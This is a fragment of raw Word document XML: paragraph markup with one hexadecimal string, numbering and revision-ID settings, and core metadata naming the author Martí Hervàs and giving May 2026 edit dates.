    <w:p w14:paraId="6F12A2D5" w14:textId="107A9B11" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t>5ec3eb98374db26c8644ccbaa45773fd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC505D8" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="172AC5CF" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="00ED29C0" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:sectPr w:rsidR="00D321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D60E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="505EA0A0"/>
    <w:lvl w:ilvl="0" w:tplc="32D8E99A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64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58"/>
    <w:rsid w:val="00003AC8"/>
    <w:rsid w:val="0011411F"/>
    <w:rsid w:val="004F42AA"/>
    <w:rsid w:val="005736DC"/>
    <w:rsid w:val="005A04FF"/>
    <w:rsid w:val="006E0F63"/>
    <w:rsid w:val="007A1FC2"/>
    <w:rsid w:val="008C65E0"/>
    <w:rsid w:val="00C9624D"/>
    <w:rsid w:val="00CA1758"/>
    <w:rsid w:val="00D3214C"/>
    <w:rsid w:val="00E90A39"/>
    <w:rsid w:val="00EA5DB2"/>
    <w:rsid w:val="00ED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5B90"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4474BB44-AE40-481D-A1F9-B3497CBF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2537</Words>
  <Characters>13954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 Hervàs</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Martí Hervàs</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-21T07:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-21T09:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>